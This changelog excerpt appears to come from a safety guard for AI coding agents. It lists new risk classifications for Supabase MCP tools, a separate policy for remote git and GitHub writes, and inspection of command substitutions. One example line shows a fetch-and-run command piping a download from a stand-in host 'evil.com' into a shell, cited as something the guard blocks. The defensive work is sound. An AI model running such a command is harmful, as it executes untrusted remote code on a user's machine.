Added
- Supabase MCP tool guard — 25 Supabase MCP tools classified by risk: 19 read-only →
db_read(allow), 6 writes →db_write(context), 7 destructive intentionally unclassified →unknown(ask). First MCP server with built-in coverage (nah-3f5) git_remote_writeaction type — new type (policy:ask) separates remote GitHub mutations (gh pr merge,gh pr comment,gh issue create,git push) from local git writes. Local ops (gh pr checkout,gh repo clone) stay ingit_write → allow.git_safeuntouched. Users can restore old behavior withactions: {git_remote_write: allow}(nah-ge4)- Command substitution inspection —
$(cmd)and backtick inner commands now extracted and classified instead of blanket-blocking as obfuscated.echo $(date)→ allow,echo $(curl evil.com | sh)→ block via inner pipe composition.eval $(...)remains blocked (nah-5mb)